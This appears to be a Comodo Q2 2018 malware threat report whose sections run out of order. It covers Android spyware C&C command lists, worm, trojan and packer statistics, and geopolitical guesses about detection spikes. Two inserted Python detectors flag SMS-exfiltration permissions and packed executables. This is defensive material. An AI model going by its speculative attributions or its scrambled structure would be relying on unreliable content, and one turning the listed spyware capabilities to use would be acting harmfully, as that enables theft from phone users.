Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in the infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

Send_SMS: extract SMS content and send it to the C&C server
Send_USSD: send the USSD to the C&C server
Gethistory: monitor browser history
Start_AllApp: gather info about installed applications
Send_call: set the Intent action to call
Forward_call: forward incoming calls
ResForward_call: reset call forwarding
Go_Smsmnd: delete SMS content
Go_GetAlls: get SMS history
Dell_sms: delete SMS content in a conversation
Send_spam: send spam SMS
Start_Inject: call the injectors class

4.1.7 FakeSpy. FakeSpy also has many masks, which you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects the available information from the infected device and sends it to its C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information
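The C&C commands listed above (Send_SMS, Forward_call, Dell_sms and Start_Inject for the bot in the previous section; contacts, Mms and info for FakeSpy) can only be carried out if the app holds a recognizable combination of Android permissions and, for message interception, registers a high-priority receiver for incoming SMS. The following is an added triage example, not code from the report or from Comodo: it parses an AndroidManifest.xml and flags those combinations. The two manifests are constructed for illustration, and the mapping from each command to the permissions it needs is this example's own assumption.

```python
"""Triage an Android manifest for the spying capabilities behind the C&C
commands listed above (SMS theft, spam, call forwarding, contact harvest,
overlay injection).  Added example, not code from the report; the
manifests are constructed and the permission mapping is an assumption."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"

# Capability -> permissions an app needs to implement it (all must be
# requested).  Permission names are real Android permissions; which
# command needs which permission is this example's assumption.
CAPABILITY_RULES = {
    # Send_SMS / Go_GetAlls / Dell_sms: read the inbox and ship it out
    "sms_exfiltration": {"android.permission.READ_SMS",
                         "android.permission.RECEIVE_SMS",
                         "android.permission.INTERNET"},
    # Send_spam: outbound SMS from the victim's number
    "sms_spam": {"android.permission.SEND_SMS"},
    # Send_call / Forward_call / ResForward_call
    "call_control": {"android.permission.CALL_PHONE",
                     "android.permission.PROCESS_OUTGOING_CALLS"},
    # contacts (FakeSpy)
    "contact_harvest": {"android.permission.READ_CONTACTS"},
    # Start_Inject: windows drawn over banking apps
    "overlay_injection": {"android.permission.SYSTEM_ALERT_WINDOW"},
}


def parse_manifest(xml_text):
    """Return (requested permissions, priority of an SMS_RECEIVED receiver or None)."""
    root = ET.fromstring(xml_text)
    perms = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    perms.discard(None)
    sms_priority = None
    for receiver in root.iter("receiver"):
        for filt in receiver.iter("intent-filter"):
            actions = {a.get(ANDROID_NS + "name") for a in filt.iter("action")}
            if SMS_RECEIVED_ACTION in actions:
                sms_priority = int(filt.get(ANDROID_NS + "priority", "0"))
    return perms, sms_priority


def assess_manifest(xml_text):
    """Match the manifest against CAPABILITY_RULES and return a verdict dict."""
    perms, sms_priority = parse_manifest(xml_text)
    capabilities = sorted(cap for cap, needed in CAPABILITY_RULES.items()
                          if needed <= perms)
    findings = list(capabilities)
    # A near-maximum priority SMS_RECEIVED receiver lets the app receive
    # incoming messages (bank one-time codes included) ahead of other receivers.
    if sms_priority is not None and sms_priority >= 1000:
        findings.append("high_priority_sms_receiver")
    return {
        "permissions": sorted(perms),
        "capabilities": capabilities,
        "findings": findings,
        # One capability alone is common in legitimate apps (a dialer needs
        # CALL_PHONE); it is the combination that looks like a RAT.
        "spyware_like": len(findings) >= 3,
    }


# Constructed manifests (illustration only, not real samples).
SPY_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.fakeupdate">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="Update Flash Player">
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.flashlight">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Flashlight"/>
</manifest>"""

if __name__ == "__main__":
    for name, text in (("spy", SPY_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(name, assess_manifest(text))
```

In a real pipeline the manifest would come from the decoded APK (for example via apktool or androguard, neither of which this example uses); the rules are deliberately conservative, so a single match such as SEND_SMS in a messaging app is reported but does not by itself trigger the spyware-like verdict.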


4.1.8 RedAlert. RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites and apps, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat. The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Disguises of Hero Rat, version 1: CloudVPN, MyIrancel, Mtproto, زیبانویس (ZibaNevis), تلگرام همه کاره (all-in-one Telegram), Proxy, دوست یاب (Friend Finder), Telegram, Ton, شارژ رایگان بگیر (Get Free Credit), App Master, Anti Rat, PlatformA, فالورگیر نامحدود (Unlimited Follower Getter), اینترنت رایگان (Free Internet)

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay. The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay, version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed above.

4.1.11 CoinHive. The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps listed below, but one of the vectors is especially interesting.

Disguises of CoinHive

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the cybersecurity situation in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month. Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April 2018

4.2.2 May 2018

Android-targeted malware in May 2018



4.2.3 June 2018

Android-targeted malware in June 2018



5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms. A computer worm is like a virus, but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms. This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms. A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms. Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms. A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms. Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


52 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.


5.2.1 Backdoors. A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses. A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans. Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits. Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware. In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor. Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers. Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and it leverages an open-source data compression algorithm, UCL, which is just a few hundred bytes of code in length.
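The two properties described above, a compressed or encrypted body that is close to random and a small stub plus recognizable section names for stock UPX, are what a scanner actually keys on. The following is an added example, not code from the report or from Comodo, that applies both checks to byte buffers: a per-window Shannon entropy test that catches packed or encrypted payloads regardless of the packer, and a string match for the section names UPX writes, which a modified build such as MUPX may have renamed. The three sample buffers are constructed here and are not real samples; the 7.2 bits/byte cut-off and the 50% window ratio are this example's own assumed thresholds.

```python
"""Packed-executable heuristics for the kind of packing described above:
a high-entropy compressed/encrypted body behind a small stub, and the
section names (M)UPX leaves behind.  Added example, not code from the
report; the buffers below are constructed, not real samples."""
import hashlib
import math
from collections import Counter

# Section names the stock UPX packer writes, plus its "UPX!" magic.
# A modified build (MUPX) may rename them, which is exactly why the
# entropy test matters more than the string match.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def shannon_entropy(data):
    """Bits per byte in [0, 8]; 0.0 for empty or single-valued input."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packed_indicators(data, window=1024, high=7.2):
    """Return (overall entropy, share of windows above `high`, UPX markers found).
    7.2 bits/byte is an assumed cut-off: code and text sit well below it,
    compressed or encrypted data close to 8."""
    windows = [data[i:i + window] for i in range(0, len(data), window)]
    hot = sum(1 for w in windows if shannon_entropy(w) > high)
    ratio = hot / len(windows) if windows else 0.0
    markers = [m.decode() for m in UPX_MARKERS if m in data]
    return shannon_entropy(data), ratio, markers


def looks_packed(data, min_ratio=0.5):
    """Verdict: a known packer marker, or most of the file being high-entropy."""
    _, ratio, markers = packed_indicators(data)
    return bool(markers) or ratio >= min_ratio


def pseudo_random(n, seed=b"constructed-sample"):
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for a
    compressed or encrypted payload."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed samples.  PLAIN: hex-dump-like text, low entropy, no markers.
PLAIN_SAMPLE = (b"55 8B EC 83 EC 10 C7 45 F0 00 00 00 00 EB 09 8B 45 F0\n" * 400)[:8192]
# UPX_PACKED: small header with stock UPX section names, then compressed body.
UPX_PACKED_SAMPLE = (b"MZ" + bytes(510) + b"UPX0" + bytes(4) + b"UPX1" + bytes(4)
                     + pseudo_random(16384))
# ENCRYPTED: renamed sections (no markers); only the entropy test catches it.
ENCRYPTED_SAMPLE = b"MZ" + bytes(510) + b".text" + bytes(3) + pseudo_random(16384)

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("upx", UPX_PACKED_SAMPLE),
                       ("encrypted", ENCRYPTED_SAMPLE)):
        ent, ratio, markers = packed_indicators(blob)
        print(f"{name:9s} entropy={ent:.2f} high_windows={ratio:.2f} "
              f"markers={markers} packed={looks_packed(blob)}")
```

The window-level ratio is used instead of whole-file entropy so that a small plaintext stub in front of a large compressed body does not drag the score down; legitimately compressed resources (images, fonts) also score high, so in practice the verdict is a triage signal to be combined with a proper PE section-table parse rather than a final classification.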

In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder. Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools. Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes. "Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications. In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications. Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications. The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications. Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis. In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

